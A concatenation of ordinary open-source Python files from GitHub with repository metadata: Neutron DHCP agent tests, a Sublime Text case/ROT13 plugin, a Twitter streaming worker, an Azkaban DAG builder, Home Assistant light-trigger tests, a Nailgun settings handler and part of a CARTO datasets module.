        network = mock.Mock()
        dh.update(network, 'ns-12345678-12')
        dh._set_default_route.assert_called_once_with(network,
                                                      'ns-12345678-12')
        # No namespaces, shouldn't set default route.
        cfg.CONF.set_override('use_namespaces', False)
        cfg.CONF.set_override('enable_metadata_network', False)
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        dh._set_default_route = mock.Mock()
        dh.update(FakeV4Network(), 'tap12345678-12')
        self.assertFalse(dh._set_default_route.called)
        # Meta data network enabled, don't interfere with its gateway.
        cfg.CONF.set_override('use_namespaces', True)
        cfg.CONF.set_override('enable_metadata_network', True)
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        dh._set_default_route = mock.Mock()
        dh.update(FakeV4Network(), 'ns-12345678-12')
        self.assertTrue(dh._set_default_route.called)
        # For completeness
        cfg.CONF.set_override('use_namespaces', False)
        cfg.CONF.set_override('enable_metadata_network', True)
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        dh._set_default_route = mock.Mock()
        dh.update(FakeV4Network(), 'ns-12345678-12')
        self.assertFalse(dh._set_default_route.called)
    def test_set_default_route(self):
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
            device = mock.Mock()
            mock_IPDevice.return_value = device
            device.route.get_gateway.return_value = None
            # Basic one subnet with gateway.
            network = FakeV4Network()
            dh._set_default_route(network, 'tap-name')
        self.assertEqual(device.route.get_gateway.call_count, 1)
        self.assertFalse(device.route.delete_gateway.called)
        device.route.add_gateway.assert_called_once_with('192.168.0.1')
    def test_set_default_route_no_subnet(self):
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
            device = mock.Mock()
            mock_IPDevice.return_value = device
            device.route.get_gateway.return_value = None
            network = FakeV4NetworkNoSubnet()
            network.namespace = 'qdhcp-1234'
            dh._set_default_route(network, 'tap-name')
        self.assertEqual(device.route.get_gateway.call_count, 1)
        self.assertFalse(device.route.delete_gateway.called)
        self.assertFalse(device.route.add_gateway.called)
    def test_set_default_route_no_subnet_delete_gateway(self):
        # Existing gateway but no subnet left: the route must be removed.
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
            device = mock.Mock()
            mock_IPDevice.return_value = device
            device.route.get_gateway.return_value = dict(gateway='192.168.0.1')
            network = FakeV4NetworkNoSubnet()
            network.namespace = 'qdhcp-1234'
            dh._set_default_route(network, 'tap-name')
        self.assertEqual(device.route.get_gateway.call_count, 1)
        device.route.delete_gateway.assert_called_once_with('192.168.0.1')
        self.assertFalse(device.route.add_gateway.called)
    def test_set_default_route_no_gateway(self):
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
            device = mock.Mock()
            mock_IPDevice.return_value = device
            device.route.get_gateway.return_value = dict(gateway='192.168.0.1')
            network = FakeV4NetworkNoGateway()
            network.namespace = 'qdhcp-1234'
            dh._set_default_route(network, 'tap-name')
        self.assertEqual(device.route.get_gateway.call_count, 1)
        device.route.delete_gateway.assert_called_once_with('192.168.0.1')
        self.assertFalse(device.route.add_gateway.called)
    def test_set_default_route_do_nothing(self):
        # Gateway already correct: neither delete nor add should happen.
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
            device = mock.Mock()
            mock_IPDevice.return_value = device
            device.route.get_gateway.return_value = dict(gateway='192.168.0.1')
            network = FakeV4Network()
            dh._set_default_route(network, 'tap-name')
        self.assertEqual(device.route.get_gateway.call_count, 1)
        self.assertFalse(device.route.delete_gateway.called)
        self.assertFalse(device.route.add_gateway.called)
    def test_set_default_route_change_gateway(self):
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
            device = mock.Mock()
            mock_IPDevice.return_value = device
            device.route.get_gateway.return_value = dict(gateway='192.168.0.2')
            network = FakeV4Network()
            dh._set_default_route(network, 'tap-name')
        self.assertEqual(device.route.get_gateway.call_count, 1)
        self.assertFalse(device.route.delete_gateway.called)
        device.route.add_gateway.assert_called_once_with('192.168.0.1')
    def test_set_default_route_two_subnets(self):
        # Try two subnets. Should set gateway from the first.
        dh = dhcp.DeviceManager(cfg.CONF, cfg.CONF.root_helper, None)
        with mock.patch.object(dhcp.ip_lib, 'IPDevice') as mock_IPDevice:
            device = mock.Mock()
            mock_IPDevice.return_value = device
            device.route.get_gateway.return_value = None
            network = FakeV4Network()
            subnet2 = FakeV4Subnet()
            subnet2.gateway_ip = '192.168.1.1'
            network.subnets = [subnet2, FakeV4Subnet()]
            dh._set_default_route(network, 'tap-name')
        self.assertEqual(device.route.get_gateway.call_count, 1)
        self.assertFalse(device.route.delete_gateway.called)
        device.route.add_gateway.assert_called_once_with('192.168.1.1')
class TestDictModel(base.BaseTestCase):
    """Exercise attribute-style access provided by dhcp.DictModel."""
    def test_basic_dict(self):
        model = dhcp.DictModel({'a': 1, 'b': 2})
        self.assertEqual(model.a, 1)
        self.assertEqual(model.b, 2)
    def test_dict_has_sub_dict(self):
        # Nested dicts must be wrapped recursively.
        model = dhcp.DictModel({'a': {'b': 2}})
        self.assertEqual(model.a.b, 2)
    def test_dict_contains_list(self):
        model = dhcp.DictModel({'a': [1, 2]})
        self.assertEqual(model.a, [1, 2])
    def test_dict_contains_list_of_dicts(self):
        # Dicts inside lists are wrapped as well.
        model = dhcp.DictModel({'a': [{'b': 2}, {'c': 3}]})
        self.assertEqual(model.a[0].b, 2)
        self.assertEqual(model.a[1].c, 3)
class TestNetModel(base.BaseTestCase):
    """Check namespace naming behaviour of dhcp.NetModel."""
    def _make_net(self, use_namespaces):
        # Helper: build a NetModel for network id 'foo'.
        return dhcp.NetModel(use_namespaces, {'id': 'foo'})
    def test_ns_name(self):
        self.assertEqual(self._make_net(True).namespace, 'qdhcp-foo')
    def test_ns_name_false_namespace(self):
        self.assertIsNone(self._make_net(False).namespace)
    def test_ns_name_none_namespace(self):
        self.assertIsNone(self._make_net(None).namespace)
|
{
"content_hash": "941a26072fad287fd98230e9ccf2e14b",
"timestamp": "",
"source": "github",
"line_count": 1493,
"max_line_length": 79,
"avg_line_length": 43.68050904219692,
"alnum_prop": 0.5675228091696696,
"repo_name": "jumpstarter-io/neutron",
"id": "c6f98643fe8e309f1fbb20bc2aa4e0e90d1c4ea0",
"size": "65851",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/test_dhcp_agent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
import string
import sublime
import sublime_plugin
class Transformer(sublime_plugin.TextCommand):
    """Base command: apply self.transformer[0] to every selection.

    Empty selections are expanded to the word under the caret before
    the transformation is applied.
    """
    def run(self, edit):
        self.transform(self.transformer[0], self.view, edit)
    def transform(self, f, view, edit):
        for region in view.sel():
            target = view.word(region) if region.empty() else region
            view.replace(edit, target, f(view.substr(target)))
class SwapCaseCommand(Transformer):
    # Invert the case of each character (one-element tuple by convention).
    transformer = string.swapcase,
class UpperCaseCommand(Transformer):
    # Upper-case the selection (Python 2 string.upper).
    transformer = string.upper,
class LowerCaseCommand(Transformer):
    # Lower-case the selection (Python 2 string.lower).
    transformer = string.lower,
class TitleCaseCommand(Transformer):
    # Capitalize each space-separated word in the selection.
    transformer = lambda s: string.capwords(s, " "),
def rot13(ch):
    """Return the ROT13 substitution for a single character *ch*.

    ASCII letters are rotated 13 places within their own case; any other
    character is returned unchanged.  Uses chr() instead of the Python 2
    only unichr(): the result is always within the ASCII range, so chr()
    is sufficient and keeps the function working on Python 3 as well.
    """
    o = ord(ch)
    if ord('a') <= o <= ord('z'):
        return chr((o - ord('a') + 13) % 26 + ord('a'))
    if ord('A') <= o <= ord('Z'):
        return chr((o - ord('A') + 13) % 26 + ord('A'))
    return ch
class Rot13Command(Transformer):
    # Apply the ROT13 cipher character-by-character to the selection.
    transformer = lambda s: "".join([rot13(ch) for ch in s]),
|
{
"content_hash": "54d78633365e5b6b8c1271ab90e814fc",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 61,
"avg_line_length": 27.18421052631579,
"alnum_prop": 0.6069699903194579,
"repo_name": "robotwholearned/dotfilesCustom",
"id": "a19451300a4d9316052c7afc8d2c22713e0d170e",
"size": "1033",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "Sublime Text 2/Packages/Default/transform.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "535082"
},
{
"name": "Shell",
"bytes": "2305"
}
],
"symlink_target": ""
}
|
'''
Example for autodoc
'''
import oauth2 as oauth
import multiprocessing
import sys, time, datetime
import bson.json_util
import requests
import httplib
# local
from drenaj.client.config.config import *
class StreamCatcher(multiprocessing.Process):
    '''
    Worker process that consumes the Twitter streaming filter API and
    forwards batches of decoded tweets to the drenaj store endpoint.

    Python 2 code (print statements, old-style except clauses).
    '''
    # NOTE(review): mutable/shared default arguments (postdata={} and
    # keystore=KeyStore()) are evaluated once at import time -- confirm
    # whether sharing a single KeyStore across instances is intended.
    def __init__(self, url = "", campaign_id="", postdata = {}, keystore = KeyStore()):
        # Ignore SIGINT here; the parent coordinates shutdown via SIGTERM.
        # NOTE(review): 'signal' is imported at module level *after* this
        # class definition -- works at call time, but fragile.
        signal.signal(signal.SIGINT, signal.SIG_IGN)
        signal.signal(signal.SIGTERM, self.on_terminate)
        # required for threads
        super(StreamCatcher, self).__init__()
        if url == "":
            self.filter_url = "https://stream.twitter.com/1.1/statuses/filter.json"
        else:
            self.filter_url = url
        # Accumulates partial lines between reads of the stream.
        self.prev_buf = ''
        self.drenaj_auth_secrets = keystore.drenaj_auth_secrets.copy()
        self.access_tokens = keystore.acquire_access_tokens()
        self.requests_session = requests.Session()
        self.requests_session.stream = True
        self.postdata = postdata
        self.keystore = keystore
        self.filter_request = self.prepare_request(postdata, keystore)
        # Set by command('stop') to ask run() to exit cleanly.
        self.abortEvent = multiprocessing.Event()
        self.drenaj_store_url = 'http://'+DRENAJ_APP_HOST+':'+str(DRENAJ_APP_PORT[DRENAJ_APP_ENVIRONMENT])+'/statuses/store'
        self.campaign_id = campaign_id
        self.streamer_id = ":".join([campaign_id, postdata['track']])
    def on_terminate(self, signal_no, frame):
        """SIGTERM handler: release tokens, close the session, notify parent."""
        print "Cleaning up for streamer_id=%s..." % self.streamer_id
        self.keystore.release_access_tokens(self.access_tokens)
        self.requests_session.close()
        # Propagate shutdown to the parent process group.
        os.kill(os.getppid(), signal.SIGINT)
        sys.exit(0)
    def prepare_request(self, postdata, keystore=KeyStore()):
        """Build a prepared, OAuth-signed POST request for the filter URL."""
        authorization_header = self.sign_request(postdata, keystore)
        req = requests.Request('POST', self.filter_url)
        req.headers.update({'Authorization': authorization_header})
        # NOTE(review): requests.Request.data may default to a list in some
        # requests versions, in which case .update would fail -- verify the
        # pinned requests version accepts this.
        req.data.update(postdata)
        return req.prepare()
    def sign_request(self, postdata, keystore=KeyStore()):
        """Return the OAuth1 Authorization header value for *postdata*."""
        token = oauth.Token(key=self.access_tokens[0][0],
                            secret=self.access_tokens[0][1])
        consumer = oauth.Consumer(key=keystore.app_consumer_key,
                                  secret=keystore.app_consumer_secret)
        signature_method = oauth.SignatureMethod_HMAC_SHA1()
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': oauth.generate_nonce(),
            'oauth_timestamp': int(time.time())
        }
        # Set our token/key parameters
        params['oauth_token'] = token.key
        params['oauth_consumer_key'] = consumer.key
        # prepare POST request on our own.
        for key, value in postdata.items():
            params[key] = value
        req = oauth.Request(method="POST",
                            url=self.filter_url,
                            parameters=params,
                            is_form_encoded=True)
        # Sign the request.
        req.sign_request(signature_method, consumer, token)
        header = req.to_header(realm='Firehose')
        return header['Authorization']
    def command(self, command_name):
        """External control entry point; only 'stop' is recognized."""
        if command_name == 'stop':
            self.abortEvent.set()
    def datetime_hook(self, dct):
        """JSON object hook: parse Twitter's created_at into a datetime."""
        if 'created_at' in dct:
            time_struct = time.strptime(dct['created_at'], "%a %b %d %H:%M:%S +0000 %Y") #Tue Apr 26 08:57:55 +0000 2011
            dct['created_at'] = datetime.datetime.fromtimestamp(time.mktime(time_struct))
            # NOTE(review): the return below makes this one redundant --
            # both branches return dct; dead code, safe to collapse.
            return dct
        return dct
    def writefunction(self, buf):
        """Accumulate stream chunks, split on CRLF and post complete JSON lines."""
        print buf
        # mongo
        self.prev_buf = self.prev_buf + (buf+'\r\n')
        params = {'campaign_id': self.campaign_id }
        if '\r\n' in self.prev_buf:
            parts = self.prev_buf.split('\r\n')
            if len(parts) > 1:
                tmp = []
                # All parts except the last are complete lines; the last
                # part is kept as the new partial buffer.
                for p in parts[0:-1]:
                    if len(p) > 0:
                        # obj = json.loads(p, object_hook=self.datetime_hook)
                        tmp.append(bson.json_util.loads(p))
                self.prev_buf = parts[-1]
            else:
                tmp = [bson.json_util.loads(parts[0])]
                self.prev_buf = ''
            # TODO: check for this.
            # When Twitter closes connection on itself, i.e. another streaming api connection is made with the same credentials, the response is like this:
            # {"disconnect":{"code":7,"stream_name":"thbounsigmalab1-statuses227378","reason":"admin logout"}}
            self.post_to_gateway(params, tmp)
    # TODO: Is it possible to make this call concurrent?
    def post_to_gateway(self, params, tmp):
        """POST a batch of tweets to the store URL with bounded retry backoff."""
        if not tmp:
            return
        params.update({'tweet_data': bson.json_util.dumps(tmp)})
        params.update(self.drenaj_auth_secrets)
        print params
        # TODO: here, error no 111 connection refused exception must be try-catched.
        stop_trying = False
        exp_backoff_duration = 1
        response = None
        # Exponential backoff: 1s, 2s, 4s, then give up (threshold 2**2).
        while not stop_trying:
            try:
                response = requests.post(self.drenaj_store_url,
                                         data=params)
                stop_trying = True
            except requests.exceptions.ConnectionError, e:
                if exp_backoff_duration > 2**2:
                    stop_trying = True
                    # TODO: log this issue at this point.
                else:
                    time.sleep(exp_backoff_duration)
                    exp_backoff_duration *= 2
        if response:
            print response.content
    def run(self):
        """Process main loop: stream lines, handle them, restart on errors."""
        self.r = self.requests_session.send(self.filter_request)
        while True:
            try:
                for line in self.r.iter_lines():
                    print line
                    self.writefunction(line)
                    if self.abortEvent.wait(0.0001):
                        # stop
                        print "shutting down.."
                        return 0
            # TODO: log these
            except httplib.IncompleteRead, e:
                print "IncompleteRead exception is catched. We'll restart the connection"
                self.filter_request = self.prepare_request(self.postdata, self.keystore)
                self.r = self.requests_session.send(self.filter_request)
                ## contine running
            except TypeError, e:
                print e
                print "Restarting"
                self.filter_request = self.prepare_request(self.postdata, self.keystore)
                self.r = self.requests_session.send(self.filter_request)
                ## contine running
            except Exception, e:
                print e
                raise e
# Registry of running StreamCatcher worker processes (despite the name,
# these are multiprocessing.Process instances, not threads).
threads = []
import signal
def stop_all_threads(signal, frame):
    # SIGINT handler: terminate all workers and exit.
    # NOTE(review): the 'signal' parameter shadows the signal module;
    # harmless here since the module is not used inside the handler.
    print 'Stopping all threads'
    for t in threads:
        t.terminate()
    sys.exit(0)
import argparse
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='streamercatcher')
    parser.add_argument('campaign_id', help='campaign name')
    # nargs='?' is required for the default to take effect: argparse
    # ignores 'default' on a required positional, so previously the
    # 'türkiye' fallback was dead and the argument was mandatory.
    parser.add_argument('keyword', nargs='?', default='türkiye',
                        help='keyword to track')
    parser.add_argument('--language')
    args = parser.parse_args()
    campaign_id = args.campaign_id
    if args.language:
        lang = args.language
    else:
        lang = None
    user_input = args.keyword
    # Only include 'language' in the filter when one was requested.
    if lang:
        postdata = {"track": user_input, "language": lang}
    else:
        postdata = {"track": user_input}
    t = StreamCatcher(
        campaign_id=campaign_id,
        postdata=postdata)
    t.start()
    threads.append(t)
    # Install the cleanup handler, then sleep until a signal arrives.
    signal.signal(signal.SIGINT, stop_all_threads)
    signal.pause()
    #while True:
    #    time.sleep(0.5)
|
{
"content_hash": "8ec8f5344521325e0da67b3276b174ea",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 154,
"avg_line_length": 32.38174273858921,
"alnum_prop": 0.5665043567401332,
"repo_name": "boun-cmpe-soslab/drenaj",
"id": "f98afcca14b430235bd2ead52e9a229929b61c68",
"size": "8059",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "drenaj/client/workers/streamcatcher.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "622"
},
{
"name": "HTML",
"bytes": "31311"
},
{
"name": "JavaScript",
"bytes": "24572"
},
{
"name": "Makefile",
"bytes": "150"
},
{
"name": "Python",
"bytes": "257094"
},
{
"name": "Shell",
"bytes": "462"
}
],
"symlink_target": ""
}
|
from os import mkdir
from azflow.Task import Task
from azflow.AzflowException import AzflowException
from collections import deque
class DAG():
    """ Define a directed acyclic graph of tasks.
        Render tasks as Azkaban jobs, with a final
        task representing the DAG as an Azkaban "flow".
    """
    def __init__(self, dag_id):
        self.dag_id = dag_id
        self.tasks = set()
        # Sentinel task appended at the end of the DAG; Azkaban treats the
        # job that nothing depends on as the flow itself.
        self.flow_task = Task(task_id=self.dag_id, dag=self)

    def add_task(self, task):
        """Register *task* as a member of this DAG."""
        self.tasks.add(task)

    def _prepare_flow(self):
        """The flow_task should come at the end of the DAG,
        so it will depend on all tasks which no other task depends on.
        """
        for t in self.tasks:
            # 'is not' instead of 'not ... is' (PEP 8 comparison idiom).
            if t is not self.flow_task and not t.downstream:
                self.flow_task.set_upstream(t)

    def _validate(self):
        """ Validate that DAG is acyclic and that the flow_task is last"""
        def _contains_cycle(head, ancestors):
            """ Perform a DFS, starting from the flow_task and working upstream.
            If at any point a node is its own ancestor,
            return True.
            """
            if head in ancestors:
                return True
            if head.upstream:
                for node in head.upstream:
                    # Short-circuit as soon as any upstream path cycles.
                    if _contains_cycle(node, ancestors + [head]):
                        return True
            return False
        if _contains_cycle(self.flow_task, []):
            raise AzflowException('Invalid DAG - cycle detected')
        if not self.flow_task.upstream:
            raise AzflowException('Invalid flow - flow_task detached')

    def render_tasks(self, output_directory):
        """ Output the necessary .job files to express this DAG
        as an Azkaban job flow.
        """
        self._prepare_flow()
        self._validate()
        try:
            mkdir(output_directory)
        except FileExistsError:
            # Reusing an existing directory is fine.
            pass
        for t in self.tasks:
            task_path = output_directory + '/' + t.task_id + '.job'
            with open(task_path, 'w') as f:
                f.write(t.render())

    def print_tasks(self):
        """ Use BFS """
        self._prepare_flow()
        self._validate()
        def bfs(node):
            # Walk upstream breadth-first from the flow task, recording each
            # task with its distance, then print deepest ancestors first.
            to_visit = deque()  # queue
            visited = set()
            to_visit.append((node, 0))
            to_print = deque()  # stack
            while to_visit:
                current, num_ancestors = to_visit.popleft()
                if current not in visited:
                    to_print.appendleft((current.task_id, num_ancestors))
                    visited.add(current)
                    to_visit.extend([(n, num_ancestors + 1)
                                     for n in current.upstream
                                     if n not in visited])
            max_ancestors = to_print[0][1]
            for task_id, num_ancestors in to_print:
                # Indent proportionally to depth below the deepest ancestor.
                print((max_ancestors - num_ancestors) * '<-' + task_id)
        bfs(self.flow_task)
|
{
"content_hash": "4f36288497273e66f77f8dda4bc9b03e",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 80,
"avg_line_length": 32.702127659574465,
"alnum_prop": 0.5322055953155498,
"repo_name": "aslotnick/azflow",
"id": "d4c5ac1bea479cf6445fa893e66a05b5d3dfb49a",
"size": "3074",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azflow/DAG.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "4583"
},
{
"name": "Python",
"bytes": "9533"
}
],
"symlink_target": ""
}
|
"""The tests device sun light trigger component."""
# pylint: disable=protected-access
from datetime import datetime
import pytest
from homeassistant.components import (
device_sun_light_trigger,
device_tracker,
group,
light,
)
from homeassistant.components.device_tracker.const import DOMAIN
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_PLATFORM,
EVENT_HOMEASSISTANT_START,
STATE_HOME,
STATE_NOT_HOME,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import CoreState
from homeassistant.setup import async_setup_component
from homeassistant.util import dt as dt_util
from tests.async_mock import patch
from tests.common import async_fire_time_changed
@pytest.fixture
def scanner(hass):
    """Initialize components.

    Sets up the test device_tracker platform (with DEV1 marked home) and
    the test light platform; yaml device registry loading is patched so
    no real known_devices file is read.
    """
    scanner = getattr(hass.components, "test.device_tracker").get_scanner(None, None)
    scanner.reset()
    scanner.come_home("DEV1")
    getattr(hass.components, "test.light").init()
    with patch(
        "homeassistant.components.device_tracker.legacy.load_yaml_config_file",
        return_value={
            "device_1": {
                "mac": "DEV1",
                "name": "Unnamed Device",
                "picture": "http://example.com/dev1.jpg",
                "track": True,
                "vendor": None,
            },
            "device_2": {
                "mac": "DEV2",
                "name": "Unnamed Device",
                "picture": "http://example.com/dev2.jpg",
                "track": True,
                "vendor": None,
            },
        },
    ):
        assert hass.loop.run_until_complete(
            async_setup_component(
                hass,
                device_tracker.DOMAIN,
                {device_tracker.DOMAIN: {CONF_PLATFORM: "test"}},
            )
        )
    # Light setup does not need the patched device registry.
    assert hass.loop.run_until_complete(
        async_setup_component(
            hass, light.DOMAIN, {light.DOMAIN: {CONF_PLATFORM: "test"}}
        )
    )
    return scanner
async def test_lights_on_when_sun_sets(hass, scanner):
    """Test lights go on when there is someone home and the sun sets."""
    # 01:02:03 UTC: set up the component while the sun is still up.
    test_time = datetime(2017, 4, 5, 1, 2, 3, tzinfo=dt_util.UTC)
    with patch("homeassistant.util.dt.utcnow", return_value=test_time):
        assert await async_setup_component(
            hass, device_sun_light_trigger.DOMAIN, {device_sun_light_trigger.DOMAIN: {}}
        )
    # Ensure the light starts off so we can observe the trigger turning it on.
    await hass.services.async_call(
        light.DOMAIN,
        light.SERVICE_TURN_OFF,
        {ATTR_ENTITY_ID: "test.light"},
        blocking=True,
    )
    # Advance to 03:00 (past sunset for this date/location) and fire the clock.
    test_time = test_time.replace(hour=3)
    with patch("homeassistant.util.dt.utcnow", return_value=test_time):
        async_fire_time_changed(hass, test_time)
        await hass.async_block_till_done()
    assert all(
        hass.states.get(ent_id).state == STATE_ON
        for ent_id in hass.states.async_entity_ids("light")
    )
async def test_lights_turn_off_when_everyone_leaves(hass):
    """Test lights turn off when everyone leaves the house."""
    assert await async_setup_component(
        hass, "light", {light.DOMAIN: {CONF_PLATFORM: "test"}}
    )
    # Start with the light on and one tracked person at home.
    await hass.services.async_call(
        light.DOMAIN,
        light.SERVICE_TURN_ON,
        {ATTR_ENTITY_ID: "test.light"},
        blocking=True,
    )
    hass.states.async_set("device_tracker.bla", STATE_HOME)
    assert await async_setup_component(
        hass, device_sun_light_trigger.DOMAIN, {device_sun_light_trigger.DOMAIN: {}}
    )
    # When the last person leaves, the trigger should switch everything off.
    hass.states.async_set("device_tracker.bla", STATE_NOT_HOME)
    await hass.async_block_till_done()
    assert all(
        hass.states.get(ent_id).state == STATE_OFF
        for ent_id in hass.states.async_entity_ids("light")
    )
async def test_lights_turn_on_when_coming_home_after_sun_set(hass, scanner):
    """Test lights turn on when coming home after sun set."""
    # 03:02:03 UTC on this date is after sunset for the test location.
    test_time = datetime(2017, 4, 5, 3, 2, 3, tzinfo=dt_util.UTC)
    with patch("homeassistant.util.dt.utcnow", return_value=test_time):
        await hass.services.async_call(
            light.DOMAIN, light.SERVICE_TURN_OFF, {ATTR_ENTITY_ID: "all"}, blocking=True
        )
        assert await async_setup_component(
            hass, device_sun_light_trigger.DOMAIN, {device_sun_light_trigger.DOMAIN: {}}
        )
        # A second device arriving home after dark should turn the lights on.
        hass.states.async_set(f"{DOMAIN}.device_2", STATE_HOME)
        await hass.async_block_till_done()
        assert all(
            hass.states.get(ent_id).state == light.STATE_ON
            for ent_id in hass.states.async_entity_ids("light")
        )
async def test_lights_turn_on_when_coming_home_after_sun_set_person(hass, scanner):
    """Test lights turn on when coming home after sun set.

    Variant that tracks a ``person`` entity (backed by device_1) via the
    ``device_group`` option; only the person's own tracker may trigger
    the lights, unrelated trackers must have no effect.
    """
    device_1 = f"{DOMAIN}.device_1"
    device_2 = f"{DOMAIN}.device_2"
    # After-sunset time for the test location.
    test_time = datetime(2017, 4, 5, 3, 2, 3, tzinfo=dt_util.UTC)
    with patch("homeassistant.util.dt.utcnow", return_value=test_time):
        await hass.services.async_call(
            light.DOMAIN, light.SERVICE_TURN_OFF, {ATTR_ENTITY_ID: "all"}, blocking=True
        )
    # Both trackers start away; lights are off.
    hass.states.async_set(device_1, STATE_NOT_HOME)
    hass.states.async_set(device_2, STATE_NOT_HOME)
    await hass.async_block_till_done()
    assert all(
        not light.is_on(hass, ent_id)
        for ent_id in hass.states.async_entity_ids("light")
    )
    assert hass.states.get(device_1).state == "not_home"
    assert hass.states.get(device_2).state == "not_home"
    # Create a person tied to device_1 and a group wrapping that person,
    # then point device_sun_light_trigger at the group.
    assert await async_setup_component(
        hass,
        "person",
        {"person": [{"id": "me", "name": "Me", "device_trackers": [device_1]}]},
    )
    await group.Group.async_create_group(hass, "person_me", ["person.me"])
    assert await async_setup_component(
        hass,
        device_sun_light_trigger.DOMAIN,
        {device_sun_light_trigger.DOMAIN: {"device_group": "group.person_me"}},
    )
    assert all(
        hass.states.get(ent_id).state == STATE_OFF
        for ent_id in hass.states.async_entity_ids("light")
    )
    assert hass.states.get(device_1).state == "not_home"
    assert hass.states.get(device_2).state == "not_home"
    assert hass.states.get("person.me").state == "not_home"
    # Unrelated device has no impact
    hass.states.async_set(device_2, STATE_HOME)
    await hass.async_block_till_done()
    assert all(
        hass.states.get(ent_id).state == STATE_OFF
        for ent_id in hass.states.async_entity_ids("light")
    )
    assert hass.states.get(device_1).state == "not_home"
    assert hass.states.get(device_2).state == "home"
    assert hass.states.get("person.me").state == "not_home"
    # person home switches on
    hass.states.async_set(device_1, STATE_HOME)
    await hass.async_block_till_done()
    await hass.async_block_till_done()
    assert all(
        hass.states.get(ent_id).state == light.STATE_ON
        for ent_id in hass.states.async_entity_ids("light")
    )
    assert hass.states.get(device_1).state == "home"
    assert hass.states.get(device_2).state == "home"
    assert hass.states.get("person.me").state == "home"
async def test_initialize_start(hass):
    """Test we initialize when HA starts."""
    # Simulate setup happening before Home Assistant has fully started.
    hass.state = CoreState.not_running
    assert await async_setup_component(
        hass,
        device_sun_light_trigger.DOMAIN,
        {device_sun_light_trigger.DOMAIN: {}},
    )
    # Activation must be deferred until the start event fires.
    with patch(
        "homeassistant.components.device_sun_light_trigger.activate_automation"
    ) as mock_activate:
        hass.bus.fire(EVENT_HOMEASSISTANT_START)
        await hass.async_block_till_done()
    assert len(mock_activate.mock_calls) == 1
|
{
"content_hash": "50ef2c95aa549adfc18c9886a5a6970a",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 88,
"avg_line_length": 32.80508474576271,
"alnum_prop": 0.609015758202015,
"repo_name": "tchellomello/home-assistant",
"id": "19715577e2ae13cd744fd5ed39ad7845446f6f07",
"size": "7742",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "tests/components/device_sun_light_trigger/test_init.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "26713364"
},
{
"name": "Shell",
"bytes": "4528"
}
],
"symlink_target": ""
}
|
from nailgun.api.v1.handlers.base import DBSingletonHandler
from nailgun.api.v1.validators.master_node_settings \
import MasterNodeSettingsValidator
from nailgun import objects
class MasterNodeSettingsHandler(DBSingletonHandler):
    """REST handler for the singleton master-node settings record."""

    # Singleton DB object this handler reads/writes.
    single = objects.MasterNodeSettings
    # Validates request payloads before they reach the object layer.
    validator = MasterNodeSettingsValidator
    # Message returned when the singleton row is missing.
    not_found_error = "Settings are not found in DB"
|
{
"content_hash": "4720c3d24b752c2590c47ccc1177dd67",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 59,
"avg_line_length": 26.928571428571427,
"alnum_prop": 0.8063660477453581,
"repo_name": "zhaochao/fuel-web",
"id": "a5800a4dae2f83e7a5a7e0c7d95fbf802fba1802",
"size": "987",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nailgun/nailgun/api/v1/handlers/master_node_settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "109800"
},
{
"name": "HTML",
"bytes": "16017"
},
{
"name": "JavaScript",
"bytes": "705662"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Puppet",
"bytes": "282"
},
{
"name": "Python",
"bytes": "3493678"
},
{
"name": "Ruby",
"bytes": "33590"
},
{
"name": "Shell",
"bytes": "26585"
}
],
"symlink_target": ""
}
|
import os
import time
import requests
from .utils import ResponseStream
from .exceptions import CartoException
# Column types accepted by DODataset.column() (user-facing names).
VALID_TYPES = [
    'STRING', 'BYTES', 'INTEGER', 'INT64', 'FLOAT',
    'FLOAT64', 'BOOLEAN', 'BOOL', 'TIMESTAMP', 'DATE', 'TIME',
    'DATETIME', 'GEOMETRY'
]

# User-facing type -> backend type renames applied when creating a dataset.
TYPES_MAPPING = {
    'GEOMETRY': 'GEOGRAPHY'
}

# Relative API paths (joined onto the auth client's base URL).
DATASETS_BASE_PATH = 'api/v4/data/observatory/user/datasets'
